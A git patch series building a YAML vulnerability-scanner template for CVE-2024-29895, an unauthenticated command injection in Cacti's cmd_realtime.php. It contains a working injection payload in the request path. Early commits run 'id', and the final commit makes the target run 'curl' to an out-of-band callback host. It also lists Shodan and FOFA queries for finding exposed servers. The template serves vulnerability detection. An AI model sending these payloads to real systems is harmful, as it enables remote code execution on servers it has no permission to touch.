From 62ad67b550d9eca9ee5ec2c00421347c25f77089 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 16 May 2024 17:15:45 +0530 Subject: [PATCH 1/8] Create CVE-2024-29895.yaml --- http/cves/2024/CVE-2024-29895.yaml | 37 ++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/cves/2024/CVE-2024-29895.yaml diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml new file mode 100644 index 0000000000..d396055b22 --- /dev/null +++ b/http/cves/2024/CVE-2024-29895.yaml @@ -0,0 +1,37 @@ +id: CVE-2024-29895 + +info: + name: Test Injection in Cacti cmd_realtime.php + author: pussycat0x + severity: critical + description: Checks for injection vulnerabilities in cmd_realtime.php on Cacti instances. + reference: + - https://www.example.com/cve-xxxx-xxxx + - https://github.com/Cacti/cacti/blob/501712998589763d411a68d35e3cda98fd9cfd18/cmd_realtime.php#L119 + - https://github.com/Cacti/cacti/commit/53e8014d1f082034e0646edc6286cde3800c683d + - https://github.com/Cacti/cacti/commit/99633903cad0de5ace636249de16f77e57a3c8fc + - https://github.com/Cacti/cacti/security/advisories/GHSA-cr28-x256-xf5m + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-29895 + cwe-id: CWE-77 + epss-score: 0.00045 + epss-percentile: 0.14626 + tags: cacti,injection + +http: + - method: GET + path: + - "{{BaseURL}}/cacti/cmd_realtime.php?1+1&&id=1+1+1" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - ""uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + part: body From 249629c0f719aa92e0d709d5b0665c0d64b2aa73 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 17 May 2024 10:40:08 +0530 Subject: [PATCH 2/8] Update CVE-2024-29895.yaml --- http/cves/2024/CVE-2024-29895.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml index d396055b22..e1d505c885 100644 --- a/http/cves/2024/CVE-2024-29895.yaml +++ b/http/cves/2024/CVE-2024-29895.yaml @@ -1,7 +1,7 @@ id: CVE-2024-29895 info: - name: Test Injection in Cacti cmd_realtime.php + name: Cacti cmd_realtime.php - command injection author: pussycat0x severity: critical description: Checks for injection vulnerabilities in cmd_realtime.php on Cacti instances. @@ -33,5 +33,5 @@ http: - type: regex regex: - - ""uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" part: body From 18b8f552675dc4f7709a12f95d139e7e836d04ec Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 17 May 2024 10:40:39 +0530 Subject: [PATCH 3/8] Update CVE-2024-29895.yaml --- http/cves/2024/CVE-2024-29895.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml index e1d505c885..6908defba7 100644 --- a/http/cves/2024/CVE-2024-29895.yaml +++ b/http/cves/2024/CVE-2024-29895.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-77 epss-score: 0.00045 epss-percentile: 0.14626 - tags: cacti,injection + tags: cve,cve2024,cacti,rce http: - method: GET From 7160a562671b6da7aaf4ff7d38b37367bffb80a2 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 17 May 2024 10:43:46 +0530 Subject: [PATCH 4/8] Update CVE-2024-29895.yaml --- http/cves/2024/CVE-2024-29895.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml index 6908defba7..b22a709c5a 100644 --- a/http/cves/2024/CVE-2024-29895.yaml +++ b/http/cves/2024/CVE-2024-29895.yaml @@ -1,7 +1,7 @@ id: CVE-2024-29895 info: - name: Cacti cmd_realtime.php - command injection + name: Cacti cmd_realtime.php - command injection author: pussycat0x severity: critical description: Checks for injection vulnerabilities in cmd_realtime.php on Cacti instances. From 056bf96bb80315ccd9bf54a4526ddee1fb60c5ff Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 17 May 2024 13:49:18 +0530 Subject: [PATCH 5/8] minor update --- http/cves/2024/CVE-2024-29895.yaml | 26 +++++++++++++++++--------- 1 file changed, 17 insertions(+), 9 deletions(-) diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml index b22a709c5a..2497c33b26 100644 --- a/http/cves/2024/CVE-2024-29895.yaml +++ b/http/cves/2024/CVE-2024-29895.yaml @@ -1,12 +1,13 @@ id: CVE-2024-29895 info: - name: Cacti cmd_realtime.php - command injection + name: Cacti cmd_realtime.php - Command Injection author: pussycat0x severity: critical - description: Checks for injection vulnerabilities in cmd_realtime.php on Cacti instances. + description: | + Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP. reference: - - https://www.example.com/cve-xxxx-xxxx + - https://github.com/Stuub/CVE-2024-29895-CactiRCE-PoC - https://github.com/Cacti/cacti/blob/501712998589763d411a68d35e3cda98fd9cfd18/cmd_realtime.php#L119 - https://github.com/Cacti/cacti/commit/53e8014d1f082034e0646edc6286cde3800c683d - https://github.com/Cacti/cacti/commit/99633903cad0de5ace636249de16f77e57a3c8fc @@ -17,7 +18,14 @@ info: cve-id: CVE-2024-29895 cwe-id: CWE-77 epss-score: 0.00045 - epss-percentile: 0.14626 + epss-percentile: 0.14706 + metadata: + verified: true + max-request: 1 + vendor: cacti + product: cacti + shodan-query: http.favicon.hash:-1797138069 + fofa-query: icon_hash="-1797138069" tags: cve,cve2024,cacti,rce http: @@ -27,11 +35,11 @@ http: matchers-condition: and matchers: + - type: regex + part: body + regex: + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + - type: status status: - 200 - - - type: regex - regex: - - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" - part: body From 1f20bbb640aa47342935e11cb3f9d456350d73cd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 17 May 2024 14:24:28 +0530 Subject: [PATCH 6/8] trailspace fix --- http/cves/2024/CVE-2024-29895.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml index 2497c33b26..d822ac3f4b 100644 --- a/http/cves/2024/CVE-2024-29895.yaml +++ b/http/cves/2024/CVE-2024-29895.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: critical description: | - Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP. + Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP. reference: - https://github.com/Stuub/CVE-2024-29895-CactiRCE-PoC - https://github.com/Cacti/cacti/blob/501712998589763d411a68d35e3cda98fd9cfd18/cmd_realtime.php#L119 From ea8e3cd0c5effbd0fe3a314ea12265e10938d0d0 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 5 Jun 2024 14:24:23 +0530 Subject: [PATCH 7/8] Update CVE-2024-29895.yaml --- http/cves/2024/CVE-2024-29895.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml index d822ac3f4b..cea5a8cd54 100644 --- a/http/cves/2024/CVE-2024-29895.yaml +++ b/http/cves/2024/CVE-2024-29895.yaml @@ -20,7 +20,6 @@ info: epss-score: 0.00045 epss-percentile: 0.14706 metadata: - verified: true max-request: 1 vendor: cacti product: cacti From 60370f59f83e106670ae9db21b37a4c2a10ad0a6 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 13 Jun 2024 22:27:56 +0530 Subject: [PATCH 8/8] Update CVE-2024-29895.yaml --- http/cves/2024/CVE-2024-29895.yaml | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml index cea5a8cd54..0a3c4f53fe 100644 --- a/http/cves/2024/CVE-2024-29895.yaml +++ b/http/cves/2024/CVE-2024-29895.yaml @@ -30,14 +30,19 @@ info: http: - method: GET path: - - "{{BaseURL}}/cacti/cmd_realtime.php?1+1&&id=1+1+1" + - "{{BaseURL}}/cacti/cmd_realtime.php?1+1&&curl%20{{interactsh-url}}+1+1+1" matchers-condition: and matchers: - - type: regex - part: body - regex: - - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: interactsh_request + words: + - "User-Agent: curl" - type: status status: